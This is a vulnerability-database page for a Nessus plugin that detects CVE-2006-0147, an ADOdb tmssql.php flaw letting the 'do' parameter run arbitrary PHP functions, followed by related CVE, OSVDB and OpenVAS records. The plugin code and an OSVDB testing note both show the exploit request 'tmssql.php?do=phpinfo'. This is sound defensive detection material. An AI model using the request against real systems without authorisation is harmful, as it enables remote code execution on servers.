Search...

ADOdb tmssql.php do Parameter Arbitrary PHP Function Execution

2006-01-10T00:00:00

ID ADODB_DO_CMD_EXECUTION.NASL
Type nessus
Reporter This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.
Modified 2006-01-10T00:00:00

Description

The remote host is running ADOdb, a database abstraction library for PHP.

The installed version of ADOdb includes a test script named 'tmssql.php' that fails to sanitize user input to the 'do' parameter before using it execute PHP code. An attacker can exploit this issue to execute arbitrary PHP code on the affected host subject to the permissions of the web server user id.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');

if (description) {
  script_id(20384);
  script_version("1.19");

  script_cve_id("CVE-2006-0147");

  script_name(english:"ADOdb tmssql.php do Parameter Arbitrary PHP Function Execution");
  script_summary(english:"Checks for do parameter command execution vulnerability in ADOdb");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server has a PHP script that allows execution of
arbitrary code." );
 script_set_attribute(attribute:"description", value:
"The remote host is running ADOdb, a database abstraction library for
PHP. 

The installed version of ADOdb includes a test script named
'tmssql.php' that fails to sanitize user input to the 'do' parameter
before using it execute PHP code.  An attacker can exploit this issue
to execute arbitrary PHP code on the affected host subject to the
permissions of the web server user id." );
 script_set_attribute(attribute:"see_also", value:"https://secuniaresearch.flexerasoftware.com/community/research/" );
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?540d6007" );
 script_set_attribute(attribute:"solution", value:
"Remove the test script or upgrade to ADOdb version 4.70 or higher." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/01/10");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/01/09");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();


  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP", "Settings/ThoroughTests");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

if (!thorough_tests) exit(0, "This plugin only runs if the 'Perofrm thorough tests' setting is enabled.");

port = get_http_port(default:80, php: 1);

subdirs = make_list(
  "/adodb/tests",                      # PHPSupportTickets
  "/lib/adodb/tests",                  # Moodle / TikiWiki
  "/library/adodb/tests",              # dcp_portal
  "/xaradodb/tests"                    # Xaraya
);


# Loop through directories.
foreach dir (cgi_dirs()) {
  foreach subdir (subdirs) {
    # Try to exploit the flaw to display PHP info.
    r = http_send_recv3(method:"GET", port: port, exit_on_fail: 1,
      item:string(
        dir, subdir, "/tmssql.php?",
        "do=phpinfo"));
    res = r[2];

    # There's a problem if it looks like the output of phpinfo().
    if ("PHP Version" &gt;&lt; res) {
      security_hole(port);
      exit(0);
    }
  }
}

exit(0, "No vulnerable software was found on port "+port+".");

JSON Vulners Source

Initial Source

{"id": "ADODB_DO_CMD_EXECUTION.NASL", "bulletinFamily": "scanner", "title": "ADOdb tmssql.php do Parameter Arbitrary PHP Function Execution", "description": "The remote host is running ADOdb, a database abstraction library for\nPHP. \n\nThe installed version of ADOdb includes a test script named\n'tmssql.php' that fails to sanitize user input to the 'do' parameter\nbefore using it execute PHP code. An attacker can exploit this issue\nto execute arbitrary PHP code on the affected host subject to the\npermissions of the web server user id.", "published": "2006-01-10T00:00:00", "modified": "2006-01-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/20384", "reporter": "This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.", "references": ["https://secuniaresearch.flexerasoftware.com/community/research/", "http://www.nessus.org/u?540d6007"], "cvelist": ["CVE-2006-0147"], "type": "nessus", "lastseen": "2021-01-20T09:17:43", "edition": 25, "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-0147"]}, {"type": "osvdb", "idList": ["OSVDB:22291"]}, {"type": "openvas", "idList": ["OPENVAS:56649", "OPENVAS:56530", "OPENVAS:56621", "OPENVAS:56536", "OPENVAS:56535"]}, {"type": "gentoo", "idList": ["GLSA-200604-07"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:12141"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1030-1:0376F", "DEBIAN:DSA-1031-1:90EAF", "DEBIAN:DSA-1029-1:B7B84"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1030.NASL", "DEBIAN_DSA-1031.NASL", "GENTOO_GLSA-200604-07.NASL", "DEBIAN_DSA-1029.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:1663"]}], "modified": "2021-01-20T09:17:43", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-01-20T09:17:43", "rev": 2}, "vulnersScore": 6.8}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description) {\n script_id(20384);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2006-0147\");\n\n script_name(english:\"ADOdb tmssql.php do Parameter Arbitrary PHP Function Execution\");\n script_summary(english:\"Checks for do parameter command execution vulnerability in ADOdb\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server has a PHP script that allows execution of\narbitrary code.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running ADOdb, a database abstraction library for\nPHP. \n\nThe installed version of ADOdb includes a test script named\n'tmssql.php' that fails to sanitize user input to the 'do' parameter\nbefore using it execute PHP code. An attacker can exploit this issue\nto execute arbitrary PHP code on the affected host subject to the\npermissions of the web server user id.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://secuniaresearch.flexerasoftware.com/community/research/\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?540d6007\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Remove the test script or upgrade to ADOdb version 4.70 or higher.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/01/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/01/09\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\", \"Settings/ThoroughTests\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nif (!thorough_tests) exit(0, \"This plugin only runs if the 'Perofrm thorough tests' setting is enabled.\");\n\nport = get_http_port(default:80, php: 1);\n\nsubdirs = make_list(\n \"/adodb/tests\", # PHPSupportTickets\n \"/lib/adodb/tests\", # Moodle / TikiWiki\n \"/library/adodb/tests\", # dcp_portal\n \"/xaradodb/tests\" # Xaraya\n);\n\n\n# Loop through directories.\nforeach dir (cgi_dirs()) {\n foreach subdir (subdirs) {\n # Try to exploit the flaw to display PHP info.\n r = http_send_recv3(method:\"GET\", port: port, exit_on_fail: 1,\n item:string(\n dir, subdir, \"/tmssql.php?\",\n \"do=phpinfo\"));\n res = r[2];\n\n # There's a problem if it looks like the output of phpinfo().\n if (\"PHP Version\" >< res) {\n security_hole(port);\n exit(0);\n }\n }\n}\n\nexit(0, \"No vulnerable software was found on port \"+port+\".\");\n", "naslFamily": "CGI abuses", "pluginID": "20384", "cpe": [], "scheme": null}

{"cve": [{"lastseen": "2021-02-02T05:27:17", "description": "Dynamic code evaluation vulnerability in tests/tmssql.php test script in ADOdb for PHP before 4.70, as used in multiple products including (1) Mantis, (2) PostNuke, (3) Moodle, (4) Cacti, (5) Xaraya, (6) PhpOpenChat, possibly (7) MAXdev MD-Pro, and (8) Simplog, allows remote attackers to execute arbitrary PHP functions via the do parameter, which is saved in a variable that is then executed as a function, as demonstrated using phpinfo.", "edition": 4, "cvss3": {}, "published": "2006-01-09T23:03:00", "title": "CVE-2006-0147", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0147"], "modified": "2018-10-19T15:42:00", "cpe": ["cpe:/a:moodle:moodle:1.5.3", "cpe:/a:john_lim:adodb:4.68", "cpe:/a:john_lim:adodb:4.66", "cpe:/a:mantis:mantis:1.0.0_rc4", "cpe:/a:postnuke_software_foundation:postnuke:0.761", "cpe:/a:mantis:mantis:0.19.4", "cpe:/a:the_cacti_group:cacti:0.8.6g"], "id": "CVE-2006-0147", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0147", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:john_lim:adodb:4.68:*:*:*:*:*:*:*", "cpe:2.3:a:postnuke_software_foundation:postnuke:0.761:*:*:*:*:*:*:*", "cpe:2.3:a:mantis:mantis:1.0.0_rc4:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6g:*:*:*:*:*:*:*", "cpe:2.3:a:moodle:moodle:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:john_lim:adodb:4.66:*:*:*:*:*:*:*", "cpe:2.3:a:mantis:mantis:0.19.4:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:19", "bulletinFamily": "software", "cvelist": ["CVE-2006-0147"], "edition": 1, "description": "## Vulnerability Description\nADOdb contains a flaw that may allow a malicious user to execute arbitrary PHP functions via the 'do' parameter. The issue is triggered due to the insecure tests/tmssql.php test script. It is possible that the flaw may result in a loss of integrity.\n## Technical Description\nSuccessful exploitation requires that the affected script is placed accessible inside the web root.\n## Solution Description\nUpgrade to version 4.70 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: \nremove adodb/tests/tmssql.php file.\n## Short Description\nADOdb contains a flaw that may allow a malicious user to execute arbitrary PHP functions via the 'do' parameter. The issue is triggered due to the insecure tests/tmssql.php test script. It is possible that the flaw may result in a loss of integrity.\n## Manual Testing Notes\nhttp://[target]/tests/tmssql.php?do=phpinfo\n## References:\nVendor URL: http://adodb.sourceforge.net/\nVendor Specific News/Changelog Entry: http://www.phplinkdirectory.com/forum/viewtopic.php?t=1668\nVendor Specific News/Changelog Entry: http://sourceforge.net/project/shownotes.php?release_id=383910&group_id=42718\nVendor Specific News/Changelog Entry: http://docs.moodle.org/en/Release_Notes#Moodle_1.5.4\n[Vendor Specific Advisory URL](http://news.postnuke.com/Article2747.html)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1029)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1030)\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1031)\n[Secunia Advisory ID:17418](https://secuniaresearch.flexerasoftware.com/advisories/17418/)\n[Secunia Advisory ID:18254](https://secuniaresearch.flexerasoftware.com/advisories/18254/)\n[Secunia Advisory ID:18267](https://secuniaresearch.flexerasoftware.com/advisories/18267/)\n[Secunia Advisory ID:19590](https://secuniaresearch.flexerasoftware.com/advisories/19590/)\n[Secunia Advisory ID:18276](https://secuniaresearch.flexerasoftware.com/advisories/18276/)\n[Secunia Advisory ID:18233](https://secuniaresearch.flexerasoftware.com/advisories/18233/)\n[Secunia Advisory ID:19591](https://secuniaresearch.flexerasoftware.com/advisories/19591/)\n[Secunia Advisory ID:19691](https://secuniaresearch.flexerasoftware.com/advisories/19691/)\n[Secunia Advisory ID:18260](https://secuniaresearch.flexerasoftware.com/advisories/18260/)\n[Secunia Advisory ID:18732](https://secuniaresearch.flexerasoftware.com/advisories/18732/)\n[Secunia Advisory ID:19555](https://secuniaresearch.flexerasoftware.com/advisories/19555/)\n[Secunia Advisory ID:19600](https://secuniaresearch.flexerasoftware.com/advisories/19600/)\n[Related OSVDB ID: 22290](https://vulners.com/osvdb/OSVDB:22290)\nOther Advisory URL: http://retrogod.altervista.org/phpopenchat_30x_sql_xpl.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200604-07.xml\n[Nessus Plugin ID:20384](https://vulners.com/search?query=pluginID:20384)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0183.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0300.html\nGeneric Exploit URL: http://milw0rm.com/exploits/1663\n[CVE-2006-0147](https://vulners.com/cve/CVE-2006-0147)\n", "modified": "2006-01-09T14:02:36", "published": "2006-01-09T14:02:36", "href": "https://vulners.com/osvdb/OSVDB:22291", "id": "OSVDB:22291", "type": "osvdb", "title": "ADOdb tmssql.php do Variable Arbitrary PHP Function Execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0147", "CVE-2006-0146"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-15T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:56649", "href": "http://plugins.openvas.org/nasl.php?oid=56649", "type": "openvas", "title": "FreeBSD Ports: cacti", "sourceData": "#\n#VID 79c1154d-d5a5-11da-8098-00123ffe8333\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: cacti\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/18276/\nhttp://secunia.com/advisories/17418/\nhttp://www.vuxml.org/freebsd/79c1154d-d5a5-11da-8098-00123ffe8333.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(56649);\n script_version(\"$Revision: 4075 $\");\n script_cve_id(\"CVE-2006-0146\", \"CVE-2006-0147\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-15 15:13:05 +0200 (Thu, 15 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: cacti\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"cacti\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0.8.6h\")<0) {\n txt += 'Package cacti version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "description": "The remote host is missing an update to cacti\nannounced via advisory DSA 1031-1.\n\nSeveral vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP, which is embedded in\ncacti, a frontend to rrdtool for monitoring systems and services. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2006-0146\n\nAndreas Sandblad discovered that improper user input sanitisation\nresults in a potential remote SQL injection vulnerability enabling\nan attacker to compromise applications, access or modify data, or\nexploit vulnerabilities in the underlying database implementation.\nThis requires the MySQL root password to be empty. It is fixed by\nlimiting access to the script in question.\n\nCVE-2006-0147\n\nA dynamic code evaluation vulnerability allows remote attackers to\nexecute arbitrary PHP functions via the 'do' parameter.\n\nCVE-2006-0410\n\nAndy Staudacher discovered an SQL injection vulnerability due to\ninsufficient input sanitising that allows remote attackers to\nexecute arbitrary SQL commands.\n\nCVE-2006-0806\n\nGulfTech Security Research discovered multiple cross-site\nscripting vulnerabilities due to improper user-supplied input\nsanitisation. Attackers can exploit these vulnerabilities to\ncause arbitrary scripts to be executed in the browser of an\nunsuspecting user's machine, or result in the theft of\ncookie-based authentication credentials.\n\nThe old stable distribution (woody) is not affected by these problems.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56530", "href": "http://plugins.openvas.org/nasl.php?oid=56530", "type": "openvas", "title": "Debian Security Advisory DSA 1031-1 (cacti)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1031_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1031-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 0.8.6c-7sarge3.\n\nFor the unstable distribution these problems will be fixed soon.\n\nWe recommend that you upgrade your cacti package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201031-1\";\ntag_summary = \"The remote host is missing an update to cacti\nannounced via advisory DSA 1031-1.\n\nSeveral vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP, which is embedded in\ncacti, a frontend to rrdtool for monitoring systems and services. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2006-0146\n\nAndreas Sandblad discovered that improper user input sanitisation\nresults in a potential remote SQL injection vulnerability enabling\nan attacker to compromise applications, access or modify data, or\nexploit vulnerabilities in the underlying database implementation.\nThis requires the MySQL root password to be empty. It is fixed by\nlimiting access to the script in question.\n\nCVE-2006-0147\n\nA dynamic code evaluation vulnerability allows remote attackers to\nexecute arbitrary PHP functions via the 'do' parameter.\n\nCVE-2006-0410\n\nAndy Staudacher discovered an SQL injection vulnerability due to\ninsufficient input sanitising that allows remote attackers to\nexecute arbitrary SQL commands.\n\nCVE-2006-0806\n\nGulfTech Security Research discovered multiple cross-site\nscripting vulnerabilities due to improper user-supplied input\nsanitisation. Attackers can exploit these vulnerabilities to\ncause arbitrary scripts to be executed in the browser of an\nunsuspecting user's machine, or result in the theft of\ncookie-based authentication credentials.\n\nThe old stable distribution (woody) is not affected by these problems.\";\n\n\nif(description)\n{\n script_id(56530);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:09:45 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2006-0146\", \"CVE-2006-0147\", \"CVE-2006-0410\", \"CVE-2006-0806\");\n script_bugtraq_id(16187,16364,16720);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 1031-1 (cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"cacti\", ver:\"0.8.6c-7sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200604-07.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:56621", "href": "http://plugins.openvas.org/nasl.php?oid=56621", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200604-07 (Cacti)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been discovered in the ADOdb layer included\nin Cacti, potentially resulting in the execution of arbitrary code.\";\ntag_solution = \"All Cacti users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n'>=net-analyzer/cacti-0.8.6h_p20060108-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200604-07\nhttp://bugs.gentoo.org/show_bug.cgi?id=129284\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200604-07.\";\n\n \n\nif(description)\n{\n script_id(56621);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-0146\", \"CVE-2006-0147\", \"CVE-2006-0410\", \"CVE-2006-0806\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200604-07 (Cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-analyzer/cacti\", unaffected: make_list(\"ge 0.8.6h_p20060108-r2\"), vulnerable: make_list(\"lt 0.8.6h_p20060108-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:42", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "description": "The remote host is missing an update to libphp-adodb\nannounced via advisory DSA 1029-1.\n\nSeveral vulnerabilities have been discovered in libphp-adodb, the 'adodb'\ndatabase abstraction layer for PHP. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2006-0146\n\nAndreas Sandblad discovered that improper user input sanitisation\nresults in a potential remote SQL injection vulnerability enabling\nan attacker to compromise applications, access or modify data, or\nexploit vulnerabilities in the underlying database implementation.\nThis requires the MySQL root password to be empty. It is fixed by\nlimiting access to the script in question.\n\nCVE-2006-0147\n\nA dynamic code evaluation vulnerability allows remote attackers to\nexecute arbitrary PHP functions via the 'do' parameter.\n\nCVE-2006-0410\n\nAndy Staudacher discovered an SQL injection vulnerability due to\ninsufficient input sanitising that allows remote attackers to\nexecute arbitrary SQL commands.\n\nCVE-2006-0806\n\nGulfTech Security Research discovered multiple cross-site\nscripting vulnerabilities due to improper user-supplied input\nsanitisation. Attackers can exploit these vulnerabilities to\ncause arbitrary scripts to be executed in the browser of an\nunsuspecting user's machine, or result in the theft of\ncookie-based authentication credentials.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 1.51-1.2.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:56535", "href": "http://plugins.openvas.org/nasl.php?oid=56535", "type": "openvas", "title": "Debian Security Advisory DSA 1029-1 (libphp-adodb)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1029_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1029-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 4.52-1sarge1.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.72-0.1.\n\nWe recommend that you upgrade your libphp-adodb package.\n\n 